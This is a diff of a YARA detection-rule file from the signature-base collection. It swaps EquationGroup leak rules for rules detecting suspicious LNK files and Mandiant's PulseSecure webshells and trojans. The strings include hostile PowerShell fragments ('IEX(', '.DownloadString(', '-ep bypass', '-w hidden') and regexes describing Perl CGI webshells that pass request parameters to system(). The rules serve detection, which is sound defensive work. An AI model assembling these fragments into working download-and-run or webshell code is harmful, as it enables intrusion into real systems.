-		hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
 
 	strings:
-		$s1 = "NtErrorMoreProcessingRequired" fullword ascii
-		$s2 = "Command Format Error: Error=%x" fullword ascii
-		$s3 = "NtErrorPasswordRestriction" fullword ascii
-		$op0 = { 8a 85 58 ff ff ff 88 43 4d }
+		$command = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$command2 = {2F 00 63 00 20 00 66 00 69 00 6E 00 64 00 73 00 74 00 72}
+		$base64 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD" ascii
+		$cert = " -decode " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 2 of them )
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 15KB and ( 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance_2 : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Suspiciouscommands : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects LNK file with suspicious content"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40066023-ede9-5669-8b4d-a26a693d8818"
-		date = "2017-04-15"
+		id = "8bfb1322-8e33-50bc-a389-2d8bdfec9ca7"
+		date = "2018-09-18"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1872-L1889"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk_files.yar#L20-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "481a08bc73ac66245c0712599a61cccdf5127276a09a67cf894f76b7763c5c9b"
-		score = 75
-		quality = 85
+		logic_hash = "a0380927ebc89e46f9138e01f154113c5e23680cea9b117b47406003ea565c1e"
+		score = 60
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
-		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
-		hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
 
 	strings:
-		$x1 = "[+] Backdoor shellcode written" fullword ascii
-		$x2 = "[*] Attempting exploit method %d" fullword ascii
+		$s1 = " -decode " ascii wide
+		$s2 = " -enc " ascii wide
+		$s3 = " -w hidden " ascii wide
+		$s4 = " -ep bypass " ascii wide
+		$s5 = " -noni " ascii nocase wide
+		$s7 = " -noprofile " ascii wide
+		$s8 = ".DownloadString(" ascii wide
+		$s9 = ".DownloadFile(" ascii wide
+		$s10 = "IEX(" ascii wide
+		$s11 = "iex(" ascii wide
+		$s12 = "WScript.shell" ascii wide fullword nocase
+		$s13 = " -nop " ascii wide
+		$s14 = "&tasklist>"
+		$s15 = "setlocal EnableExtensions DisableDelayedExpansion"
+		$s16 = "echo^ set^"
+		$s17 = "del /f /q "
+		$s18 = " echo | start "
+		$s19 = "&& echo "
+		$s20 = "&&set "
+		$s21 = "%&&@echo off "
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+		uint16( 0 ) == 0x004c and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Emphasismine : FILE
+rule SIGNATURE_BASE_SUSP_DOC_LNK_In_ZIP : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects suspicious .doc.lnk file in ZIP archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc684f39-4971-52e0-b5ec-d28c7ce7032b"
-		date = "2017-04-15"
+		id = "9c140d02-3b18-5faf-bb1d-2eb5c07a23dc"
+		date = "2019-07-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1891-L1910"
+		reference = "https://twitter.com/RedDrip7/status/1145877272945025029"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk_files.yar#L53-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "20ec32f5e9e439fb212985d5ae104ae5742231f594423cd125a9e64ed6eb234a"
-		score = 75
+		logic_hash = "ef4cdaad05af12f210aa6324a1e34a42843f814c59fb0085ac18370917ad4866"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b"
-		hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26"
+		hash1 = "7ea4f77cac557044e72a8e280372a2abe072f2ad98b5a4fbed4e2229e780173a"
 
 	strings:
-		$x1 = "Error: Could not calloc() for shellcode buffer" fullword ascii
-		$x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" fullword ascii
-		$x3 = "Generating shellcode" fullword ascii
-		$x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" fullword ascii
-		$x5 = "Error: Domino is not the expected version. (%s, %s)" fullword ascii
+		$s1 = ".doc.lnk" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		uint16( 0 ) == 0x4b50 and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance : FILE
+rule SIGNATURE_BASE_FE_Webshell_PL_ATRIUM_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "40066023-ede9-5669-8b4d-a26a693d8818"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "b2663343-0bae-5215-a443-866ab8626bff"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1912-L1930"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L12-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "757740038b9b1e1d099bb208104e9f48e7eb57ffb2de09e83c66df7914b816cb"
+		hash = "ca0175d86049fa7c796ea06b413857a3"
+		logic_hash = "869b397616495c644beb997602eac84ddcdbacce4c14755c555f5bda36663ca2"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
-		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
+		quality = 60
+		tags = ""
 
 	strings:
-		$x1 = "[-] Error: Exploit choice not supported for target OS!!" fullword ascii
-		$x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" fullword ascii
-		$x3 = "[-] Error: Backdoor not present on target" fullword ascii
-		$x4 = "***********    TARGET ARCHITECTURE IS X64    ************" fullword ascii
+		$s1 = "CGI::param("
+		$s2 = "system("
+		$s3 = /if[\x09\x20]{0,32}\(CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)\)\s{0,128}\{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\\n\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my \$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)[\x09\x20]{0,32};\s{0,128}system\([\x22\x27]\$/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them ) or 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen4 : FILE
+rule SIGNATURE_BASE_FE_Trojan_SH_ATRIUM_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f935c942-02a4-59b3-89ce-e5e3fa1cacda"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "c49441f4-a138-534c-a858-a7462ed865c9"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1932-L1963"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "68a85b4109a2222dce0625aae8a55541206b9275236232e5049e5b4ee28d8e52"
+		hash = "a631b7a8a11e6df3fccb21f4d34dbd8a"
+		logic_hash = "672a293660d89d5d7d62a658c360bad0b6408611d8794744b17a81e6a75ceea7"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd"
-		hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6"
-		hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
-		hash4 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
-		hash5 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
-		hash6 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
-		hash7 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
-		hash8 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
-		hash9 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
-		hash10 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
-		hash11 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
-		hash12 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
-		hash13 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
-		hash14 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
+		quality = 60
+		tags = ""
 
 	strings:
-		$x1 = "[+] \"TargetPort\"      %hu" fullword ascii
-		$x2 = "---<<<  Complete  >>>---" fullword ascii
-		$x3 = "[+] \"NetworkTimeout\"  %hu" fullword ascii
-		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
+		$s1 = "CGI::param("
+		$s2 = "Cache-Control: no-cache"
+		$s3 = "system("
+		$s4 = /sed -i [^\r\n]{1,128}CGI::param\([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param\([^\r\n]{1,128}system\(/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( 1 of ( $x* ) or 2 of them ) )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen1 : FILE
+rule SIGNATURE_BASE_FE_APT_Webshell_PL_HARDPULSE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "98b0a398-7761-5506-bd2f-117c118df11f"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "f9a2922e-6b8e-5f92-a947-3215ee8883ac"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1965-L1984"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L46-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd40d51ba26706517dae332d84f574eb206a424693cfb586375695e364990b5d"
+		hash = "980cba9e82faf194edb6f3cc20dc73ff"
+		logic_hash = "37fc40fd998d3294edb05707170bc2deec524fc6451bff212901f9ac3e34bb35"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31"
-		hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7"
+		quality = 83
+		tags = ""
 
 	strings:
-		$x1 = "Restart with the new protocol, address, and port as target." fullword ascii
-		$x2 = "TargetPort      : %s (%u)" fullword ascii
-		$x3 = "Error: strchr() could not find '@' in account name." fullword ascii
-		$x4 = "TargetAcctPwd   : %s" fullword ascii
-		$x5 = "Creating CURL connection handle..." fullword ascii
+		$r1 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}unless[\x09\x20]{0,32}\(open\(\$\w{1,64},[\x09\x20]{0,32}\$\w{1,64}\)\)\s{0,128}\{\s{1,128}goto[\x09\x20]{1,32}\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}return[\x09\x20]{1,32}0[\x09\x20]{0,32}\x3b\s{0,128}\}/
+		$r2 = /open[\x09\x20]{0,32}\(\*\w{1,64}[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>/
+		$r3 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/
+		$s1 = "CGI::request_method()"
+		$s2 = "CGI::param("
+		$s3 = "syswrite("
+		$s4 = "print $_"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen2 : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_LOCKPICK_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e47de7dd-8a37-5d0d-9af2-2a30fa000b05"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "00c09378-25a0-55f1-8d93-7b22d98bd8c2"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1986-L2012"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L66-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2c0833e92e23d595ebcf4af042febc44fba594356a647eb98e48b6fabf018d72"
+		hash = "e8bfd3f5a2806104316902bbe1195ee8"
+		logic_hash = "1623c2dc63fe7d595069a024b715bbca267ec1c9400afcadc377ae58afb81a2a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5"
-		hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e"
-		hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b"
-		hash4 = "8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba"
 
 	strings:
-		$s1 = "[+] Setting password : (NULL)" fullword ascii
-		$s2 = "[-] TbBuffCpy() failed!" fullword ascii
-		$s3 = "[+] SMB negotiation" fullword ascii
-		$s4 = "12345678-1234-ABCD-EF00-0123456789AB" fullword ascii
-		$s5 = "Value must end with 0000 (2 NULLs)" fullword ascii
-		$s6 = "[*] Configuring Payload" fullword ascii
-		$s7 = "[*] Connecting to listener" fullword ascii
-		$op1 = { b0 42 40 00 89 44 24 30 c7 44 24 34 }
-		$op2 = { eb 59 8b 4c 24 10 68 1c 46 }
+		$sb1 = { 83 ?? 63 0F 84 [4] 8B 45 ?? 83 ?? 01 89 ?? 24 89 44 24 04 E8 [4] 85 C0 }
+		$sb2 = { 83 [2] 63 74 ?? 89 ?? 24 04 89 ?? 24 E8 [4] 83 [2] 01 85 C0 0F [5] EB 00 8B ?? 04 83 F8 02 7? ?? 83 E8 01 C1 E0 02 83 C0 00 89 44 24 08 8D 83 [4] 89 44 24 04 8B ?? 89 04 24 E8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of ( $s* ) and 1 of ( $op* ) ) or 3 of them
+		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen3 : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_PACEMAKER : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7951fac1-9d5f-5991-a19a-88f3c8402e39"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "459e26f1-4ea9-56dd-ad71-0ed2c7499aea"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2014-L2042"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L81-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99b293d441fd27a6295e6a93123cf45e787472fb61575d566e7b4e0c61226fdb"
+		hash = "d7881c4de4d57828f7e1cab15687274b"
+		logic_hash = "f3f89744ce558179f36da3b412ba4afb3798684e6d976ef59de565b5a3323ad6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
-		hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
-		hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
-		hash4 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
-		hash5 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
-		hash6 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
-		hash7 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
-		hash8 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
-		hash9 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
-		hash10 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
-		hash11 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
-		hash12 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
 
 	strings:
-		$s1 = "Logon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)" fullword ascii
-		$s2 = "[-] Could not set \"CredentialType\"" fullword ascii
-		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
+		$s1 = "\x00/proc/%d/mem\x00"
+		$s2 = "\x00/proc/%s/maps\x00"
+		$s3 = "\x00/proc/%s/cmdline\x00"
+		$sb1 = { C7 44 24 08 10 00 00 00 C7 44 24 04 00 00 00 00 8D 45 E0 89 04 24 E8 [4] 8B 45 F4 83 C0 0B C7 44 24 08 10 00 00 00 89 44 24 04 8D 45 E0 89 04 24 E8 [4] 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] EB }
+		$sb2 = { 8B 95 [4] B8 [4] 8D 8D [4] 89 4C 24 10 8D 8D [4] 89 4C 24 0C 89 54 24 08 89 44 24 04 8D 85 [4] 89 04 24 E8 [4] C7 44 24 08 02 00 00 00 C7 44 24 04 00 00 00 00 8B 45 ?? 89 04 24 E8 [4] 89 45 ?? 8D 85 [4] 89 04 24 E8 [4] 89 44 24 08 8D 85 [4] 89 44 24 04 8B 45 ?? 89 04 24 E8 [4] 8B 45 ?? 89 45 ?? C7 45 ?? 00 00 00 00 [0-16] 83 45 ?? 01 8B 45 ?? 3B 45 0C }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them )
+		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_Linux_PACEMAKER : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5562d1a-7980-5fb8-b098-2e26003fb159"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "5a20260a-5389-57da-956c-97063fed5015"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2054-L2070"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L99-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "69b9514508f557376d876262793e5650289abfeeeee8b5ca9beaf42f3ec4d64c"
+		hash = "d7881c4de4d57828f7e1cab15687274b"
+		logic_hash = "cf83024cbbd500a301ac3c859b680cd79acabc232ea6f42c23fe9f8918a8d914"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19"
 
 	strings:
-		$x1 = "-xd = dump archive data & store in scancodes.txt" fullword ascii
-		$x2 = "-------- driver start token -------" fullword wide
-		$x3 = "-------- keystart token -------" fullword wide
-		$x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" fullword ascii
+		$s1 = "\x00Name:%s || Pwd:%s || AuthNum:%s\x0a\x00"
+		$s2 = "\x00/proc/%d/mem\x00"
+		$s3 = "\x00/proc/%s/maps\x00"
+		$s4 = "\x00/proc/%s/cmdline\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 2 of them )
+		( uint32( 0 ) == 0x464c457f ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Aduser_Implant : FILE
+rule SIGNATURE_BASE_FE_APT_Webshell_PL_PULSECHECK_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4ba152c8-aa81-5558-8ad3-c62aa3231dab"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "f375fdd8-567b-569b-85f4-af54a35d2a93"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2072-L2086"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L116-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d378773f4acd850e5a8d92d6cce84d57f659330edc025565cf4bc34afb0a6ae6"
+		hash = "a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1"
+		logic_hash = "aba457dd33232ef37ca145c5b7cd9c5fe809730339a55c5e90ac46b4a136f6cb"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f"
+		quality = 60
+		tags = ""
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$s2 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
+		$r1 = /while[\x09\x20]{0,32}\(<\w{1,64}>\)[\x09\x20]{0,32}\{\s{1,256}\$\w{1,64}[\x09\x20]{0,32}\.=[\x09\x20]{0,32}\$_;\s{0,256}\}/
+		$s1 = "use Crypt::RC4;"
+		$s2 = "use MIME::Base64"
+		$s3 = "MIME::Base64::decode("
+		$s4 = "popen("
+		$s5 = " .= $_;"
+		$s6 = "print MIME::Base64::encode(RC4("
+		$s7 = "HTTP_X_"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+		$s1 and $s2 and ( @s3 [ 1 ] < @s4 [ 1 ] ) and ( @s4 [ 1 ] < @s5 [ 1 ] ) and ( @s5 [ 1 ] < @s6 [ 1 ] ) and ( #s7 > 2 ) and $r1
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Implant : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_PULSEJUMP_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5fa5ff71-42fa-58e2-a826-341fb73ea08a"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
